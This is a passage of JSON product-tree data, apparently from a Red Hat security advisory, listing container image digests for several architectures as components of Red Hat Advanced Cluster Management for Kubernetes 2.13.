"product_reference": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
